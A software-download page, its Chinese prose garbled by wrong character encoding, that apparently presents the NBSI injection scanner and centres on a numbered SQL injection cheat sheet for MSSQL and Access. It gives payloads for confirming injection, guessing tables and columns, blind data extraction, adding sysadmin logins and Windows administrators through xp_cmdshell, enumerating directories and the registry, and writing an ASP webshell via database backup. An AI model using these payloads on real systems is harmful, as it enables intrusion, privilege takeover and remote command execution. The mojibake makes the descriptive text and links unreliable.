NBSI×¢ÈëÍøվ©¶´É¨ÃèרÓù¤¾ßÊÇÒ»¿î¹¦ÄÜÆëÈ«µÄAPP£¬ÓÉvbÓïÑÔ׫дµÄÍøվ©¶´¼ì²âרÓù¤¾ßµÄÃû×Ö£¬ASP×¢ÈëÍøվ©¶´É¨ÃèרÓù¤¾ß£¬ÓÈÆäÔÚsql server×¢Èë¼ìÑé²ãÃæÓнϸߵÄ׼ȷ¶È¡£
1.·Ö±æÊDz»ÊÇÓÐ×¢Èë
;and 1=1
;and 1=2
2.·ÖÎöÅжÏÊDz»ÊÇmssql
;and user0
3.·Ö±æÊý¾Ý¿âϵͳÈí¼þ
;and (select count(*) from sysobjects)0 mssql
;and (select count(*) from msysobjects)0 access
4.×¢ÈëÖ÷Òª²ÎÊýÊDZêʶ·û
and [²éѯÌõ¼þ] and =
5.¼ìË÷ʱû¹ýÂÇÖ÷Òª²ÎÊýµÄ
and [²éѯÌõ¼þ] and %=
6.²ÂÊý¾Ý¿â
;and (Select Count(*) from [Êý¾Ý¿âÃû])0
7.²Â×Ö¶Î
;and (Select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0
8.²Â×Ö¶ÎÖмͼ³¤¶Ì
;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)0
9.(1)²Â×ֶεÄasciiÖµ£¨access£©
;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0
(2)²Â×ֶεÄasciiÖµ£¨mssql£©
;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)0
10.¼ì²â¹ÜÀíȨÏÞ¹¹Ô죨mssql£©
;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
;and 1=(SELECT IS_MEMBER(db_owner));--
11.¼ÓÉÏmssqlºÍÌåϵµÄÕ˺Å
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add
;--
;exec master.dbo.xp_cmdshell net user username
password /add;--
;exec master.dbo.xp_cmdshell net localgroup
administrators username /add;--
12.(1)½âÎöxmlÎļþĿ¼
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree c:\
;and (select top 1 paths from dirs)0
;and (select top 1 paths from dirs where paths not
in(Éϲ½»ñµÃµÄpaths)))
(2)½âÎöxmlÎļþĿ¼
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- µÃµ½µ±½ñÈ«²¿¿ØÖÆÆ÷
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- µÃµ½¸ùĿ¼Ŀ¼
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- µÃµ½È«²¿¸ùĿ¼µÄÎļþĿ¼Ê÷Ðνṹ
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- ²éѯÎĵµµÄƒÈÈÝ
13.mssqlÖеÄsqlÓï¾ä
xp_regenumvalues ×¢²á±íÎļþ¸ù¼ü, ×Ó¼ü
;exec xp_regenumvalues HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Run ÒԺü¸¸ö¼Ç¼¼¯·½·¨»Øµ½È«²¿¼üÖµ
xp_regread ¸ù¼ü,×Ó¼ü,¼üÖµÃû
;exec xp_regread HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
CommonFilesDir »Øµ½Öƶ©¼üµÄÖµ
xp_regwrite ¸ù¼ü,×Ó¼ü, ÖµÃû, ÖµÖÖÀà, Öµ
ÖµÖÖÀàÓÐ2ÖÖREG_SZ ±íÃ÷×Ö·ûÐÍ,REG_DWORD ±íÃ÷ÕûÐÎ
;exec xp_regwrite HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName,reg_sz,hello ÔØÈë×¢²á±íÎļþ
xp_regdeletevalue ¸ù¼ü,×Ó¼ü,ÖµÃû
exec xp_regdeletevalue HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName ɾµôijһֵ
xp_regdeletekey HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey Í˸ñ¼ü,°üº¬¸Ã¼üÏÂÈ«²¿Öµ
14.mssqlµÄbackup½¨Á¢webshell
use model
create table cmd(str image);
insert into cmd(str) values (% Dim oScript %);
backup database model to disk=c:\l.asp;
15.mssqlÄÚǶº¯Êý¹«Ê½
;and (select @@version)0 µÃµ½WindowsµÄ°æ±¾ÐÅÏ¢
;and user_name()=dbo ·Ö±æµ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§ÊÇ·ñsa
;and (select user_name())0 ±¬µ±½ñϵͳÈí¼þµÄÁª½Ó¿Í»§
;and (select db_name())0 »ñµÃµ±½ñÁª½ÓµÄÊý¾Ý¿â
16.¼òÔ¼µÄwebshell
use model
create table cmd(str image);
insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);
backup database model to disk=g:\wwwtest\l.asp;
ÒªÇóµÄÇé¿öÏ£¬ÏñÕâÑù×ÓÓãº
http://ip/l.asp?c=dir
ÃÜÂ룺
Ïà¹Ø¹¥ÂÔ
©¶´¼ì²â¹¤¾ß_©¶´¼ì²â¹¤¾ßÅÅÐаñ_©¶´¼ì²â¹¤¾ßg
MySQLÊý¾Ý¿âÏÂÔØ©¶´¹¥»÷¼¼Êõ
ϵͳ¼ì²â¹¤¾ß_ϵͳ¼ì²â¹¤¾ßÈí¼þ_ϵͳ¼ì²â¹¤¾ßÓÐÄÄЩ
pe¹Ì̬ӲÅ̼ì²â¹¤¾ß_Ó²Å̼ì²â¹¤¾ßÄĸöºÃ Áù¿îרҵµÄÓ²Å̼ì²â¹¤¾ßÍƼö
Ó²¼þ¼ì²â¹¤¾ßÃâ·ÑʹÓÃ_Ó²¼þ¼ì²â¹¤¾ßÃâ·ÑʹÓÃÂð_Ó²¼þ¼ì²â¹¤¾ßÃâ·ÑʹÓÃÓÐÄÄЩ
Ó²ÅÌËٶȼì²â¹¤¾ßÍƼö_Ó²ÅÌËٶȼì²â¹¤¾ßÍƼöÄĸö_Ó²ÅÌËٶȼì²â¹¤¾ßÍƼöÖªºõ
ÊÖ»úÓ²¼þ¼ì²â¹¤¾ßÃâ·ÑʹÓÃ_ÊÖ»úÓ²¼þ¼ì²â¹¤¾ßÃâ·ÑʹÓÃÂð_ÊÖ»úÓ²¼þ¼ì²â¹¤¾ßÃâ·ÑʹÓõÄÈí¼þ
¹«Íø¼°¶Ë¿ÚÓ³Éä¼ì²â¹¤¾ß--IpTest
רҵӲÅ̼ì²â¹¤¾ßHD TuneʹÓý̳Ì
HD TuneÓ²Å̼ì²â¹¤¾ßʹÓ÷½·¨
Ïà¹ØרÌâ
¶àÌØÊÖÓÎרÌâΪÄúÌṩÃλÃÊÖÓÎË¢½ð±Ò©¶´,ÃλÃÊÖÓÎתÒÆ100Íò½ð±Ò¡£°²×¿Æ»¹û°æÒ»Ó¦¾ãÈ«,ÕÒ¾µäÊÖÓξÍÀ´¶àÌØÊÖ»úÓÎϷƵµÀÏÂÔØ!
©¶´É¨Ã蹤¾ßµÄÖ÷Òª¹¦ÄÜÊÇͨ¹ý¿ª·¢¶Ô±¾µØ¼ÆËã»ú½øÐÐɨÃ裬ͨ¹ý©¶´É¨Ã蹤¾ßÆÀ¹À¼ÆËã»úµÄ½¡¿µ×´¿ö£¬·ÖÎö¼ÆËã»úÖÐÊÇ·ñ´æÔÚ°²È«Â©¶´¡£ÔÚÐí¶àÇé¿öÏ£¬ÎÒÃÇÔÚ©¶´É¨Ãè¹ý³ÌÖÐʹÓ鶴ɨÃ蹤¾ß£¬Í¨¹ýϵͳ²»¶Ï¸üкÍÐÞ¸´Â©¶´£¬Ìá¸ß¼ÆËã»ú°²È«ÐÔ¡£ÏÂÃæµÄ°æ±¾ÎªÄúÕûÀíÁËһЩ©¶´É¨Ã蹤¾ß¡£ÓÐÐèÒªµÄÅóÓÑ¿ÉÒÔÏÂÔز¢Ê¹ÓÃËüÃÇ¡£¶àÌØÈí¼þרÌâΪÄúÌṩ©¶´É¨Ã蹤¾ß,¹«Ë¾Â©¶´É¨Ã蹤¾ß,°²×¿Â©¶´É¨Ã蹤¾ß¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«Èí¼þÏÂÔØ¡£
¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿â¹¤¾ß,Êý¾Ý¿â²éѯ¹¤¾ß,Êý¾Ý¿âÁ¬½Ó¹¤¾ß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ
¶àÌØÈí¼þרÌâΪÄúÌṩ©¶´¼ì²â,·þÎñÆ÷©¶´¼ì²â,app©¶´¼ì²â¹¤¾ß;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ
¶àÌØÈí¼þרÌâΪÄúÌṩÊý¾Ý¿âÈí¼þ,Ãâ·ÑÊý¾Ý¿âÈí¼þ,Êý¾Ý¿âÈí¼þÅÅÐÐ;°²×¿Æ»¹û°æÈí¼þappÒ»Ó¦¾ãÈ«¡£¶àÌØÈí¼þÕ¾Ö»ÌṩÂÌÉ«¡¢ÎÞ¶¾¡¢ÎÞ²å¼þ¡¢ÎÞľÂíµÄ´¿ÂÌÉ«¹¤¾ßÏÂÔØ
ͬÀàÅÅÐÐ
×î½ü¸üÐÂ
